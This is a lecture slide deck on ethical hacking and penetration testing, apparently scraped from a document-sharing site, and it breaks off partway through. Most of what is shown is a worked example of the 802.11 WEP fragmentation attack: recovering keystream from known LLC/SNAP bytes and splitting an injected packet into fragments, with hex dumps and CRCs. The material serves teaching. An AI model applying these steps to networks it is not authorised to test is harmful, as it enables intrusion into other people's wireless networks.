HackingBackgroundIntroductionQuestionAnswerSlide 6TruthSlide 8Slide 9Slide 10ExamplesSlide 12Slide 13802.11 Fragmentation AttackSlide 15Slide 16Slide 17Slide 18Slide 19Slide 20Slide 21Slide 22802.11 Fragmentation Attack ExampleSlide 24Slide 25Slide 26Slide 27Slide 28Slide 29Slide 30Slide 31ResearchSoftware RadioSlide 34USRPSlide 36DaughterboardsSlide 38Slide 39Wireless Communication SecuritySlide 41Slide 42VW Key FobSlide 44Slide 45Slide 46Slide 47Slide 48Slide 49Slide 50Slide 51Slide 52Slide 53NextGSMSlide 56Slide 57Slide 58Slide 59Slide 60Slide 61ConclusionHackingJoshua Lackey, Ph.D.Background•Ph.D., Mathematics. University of Oregon. 1995 – 2000•Senior Ethical Hacker. IBM Global Services. 1999 – 2005•Security Software Developer. Microsoft SWI Attack Team. 2005 –IntroductionHacking as a White HatRequirements•Technical Talk•One 50 minute lecturePersonal Requirements•Not boringQuestionWhy would anyone spend $1.5k – $2k per day for a penetration test?Answer•Cost/benefit•Risk analysis–how?•Example–an MSRC bulletin costs between $100k and $200k.–design review, threat model review, history of product/feature, training statistics feed into the risk analysis.–this determines if more work must be performed.AnswerThe goal of any penetration test or ethical hack is to determine the truth.TruthIs what we believe, what we have been told actually true?Is what we designed, what we implemented secure?Truth•Adversarial Situations–“of course we did this securely”•Acquisitions–quality analysis–unknown environment•Talent–“never even thought of that”TruthThe best plans include security analysis in all phases of development.•Design–Penetration testing during design phase provides feedback before implementation.–The worst flaws are design flaws.•Implementation–Software developers who understand how to write secure code.TruthDoes it really cost $1.5k – $2k per day per penetration tester?For top-level penetration testers, these are the standard security consultant’s fees.The main reason is that the talent required is not so common.ExamplesExamples from work.Problem:I cannot discuss any of my good examples.ExamplesExamples from my research.–802.11 Fragmentation Attack–VW Key Fob–GSMExamplesMost of what I’m going to speak about is works-in-progress.There will be a lot of questions and very few answers.802.11 Fragmentation Attack(This is finished research.)Serious Design Flaw – trying to gauge how much this cost is difficult. (Especially since most people/companies haven’t addressed this…)Would have been extremely difficult to find in design phase anyway. (Although possible.)802.11 Fragmentation AttackBest previous attack:Weaknesses in the Key Scheduling Algorithm of RC4. Fluhrer, Mantin, Shamir.•Vendors countered by not using weak IVs.•Unfortunately, this was not enough. (Although many thought it was.)802.11 Fragmentation AttackA vulnerability exists in the IEEE 802.11 protocol which allows an attacker the ability to transmit WEP encrypted packets without knowing the encryption key.This vulnerability allows an attacker to decrypt packets as well.This was disclosed to CERT on September 16, 2003.802.11 Fragmentation AttackRC4 EncryptionIf we denote by E_k(P) the encryption of the plain-text message P by the RC4 encryption method with key k, we haveE_k(P) = X + PWhere X is the pseudo-random bit-stream generated by the RC4 PRGA with key k .And thusE_k(P) + P = X802.11 Fragmentation AttackLogical Link Control PacketsThe most common LLC/SNAP packet seen on an 802.11 network is the Ethernet type LLC with IP.Explicitly, this packet consists of the following eight bytes.P' = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00 }802.11 Fragmentation AttackLogical Link Control PacketsEach encrypted packet on an 802.11 network is encapsulated in a logical-link control packet.That is, each packet P is the concatenation of P', given above, and some P'‘.P = P' P''802.11 Fragmentation AttackLogical Link Control PacketsBy the above comments on RC4, we can find the first eight bytes of the pseudo-random bit-stream X' generated by the key used to encrypt this packet,X' = E_k(P') + P'Because we know the plain-text P', we can encrypt any arbitrary eight bytes with key k. We have, for any eight byte text Q,E_k(Q) = X' + Q802.11 Fragmentation Attack802.11 FragmentationSection 9.4 of the 1999 IEEE 802.11 protocol specification provides a method to fragment packets when needed. Moreover, each fragment is encrypted individually.802.11 Fragmentation AttackBy transmitting packets in fragments, an attacker can inject arbitrary packets into a WEP encrypted 802.11 wireless network.802.11 Fragmentation Attack ExampleCapture a packet, including the 802.11 headers, off a WEP encrypted network.08 41 02 01 00 04 5a 37 ee 75 00 0e 35 ea 75 1700 00 24 50 da 11 00 01 55 f9 47 00 db 76 e1 6614 cf 05 c5 51 06 95 41 70 06 2d 4f 96 0e 0a 013c 6f fc bd 38 a2 21 02 33 0c 50 f1 e9 ae a4 8a5e 16 49 41802.11 Fragmentation Attack ExampleIf we parse the 802.11 header, we find this packet contains the following.type: data frame, data only to_ds: 1, from_ds: 1, more_frag: 0,retry: 0, pwr_mgt: 0, more_data: 0,wep: 1, order: 0dur: 102a1: 00-04-5A-37-EE-75a2: 00-0E-35-EA-75-17a3: 00-00-24-50-DA-11seq: frag = 00, num = 0010data:55 f9 47 00 db 76 e1 66 14 cf 05 c5 51 06 95 4170 06 2d 4f 96 0e 0a 01 3c 6f fc bd 38 a2 21 0233 0c 50 f1 e9 ae a4 8a 5e 16 49 41802.11 Fragmentation Attack ExampleThe first 10 encrypted data bytes are:db 76 e1 66 14 cf 05 c5 51 06Assuming that we have a IPv4 packet with a Ethertype LLC/SNAP header, the plain-text data is:aa aa 03 00 00 00 08 00 45 00Therefore the first ten bytes of the pseudo-random bit-stream are derived as follows. db 76 e1 66 14 cf 05 c5 51 06 + aa aa 03 00 00 00 08 00 45 00 ------------------------------- 71 dc e2 66 14 cf 0d c5 14 06802.11 Fragmentation Attack ExampleSuppose we wish to transmit an ICMP echo request.45 00 00 2c 7a 0f 00 00 ff 01 33 b9 01 02 03 04 E..,z.....3.....0a 01 00 02 08 00 6d 81 5d 02 2f 96 69 6e 6a 65 ......m.]./.inje63 74 65 64 20 70 61 63 6b 65 74 00 cted packet.802.11 Fragmentation Attack ExampleBreak this packet into fragments.fragment 0:data: aa aa 03 00 00 00crc : f2 bb 67 21fragment 1:data: 08 00 45 00 00 2ccrc : 22 e7 83 c3fragment 2:data: 25 4c 00 00 ff 01crc : 8a 4d 83 9ffragment 3:data: 88 7c 0a 01 00 02crc : a7 d1 72 ff[…]802.11
View Full Document
Unlocking...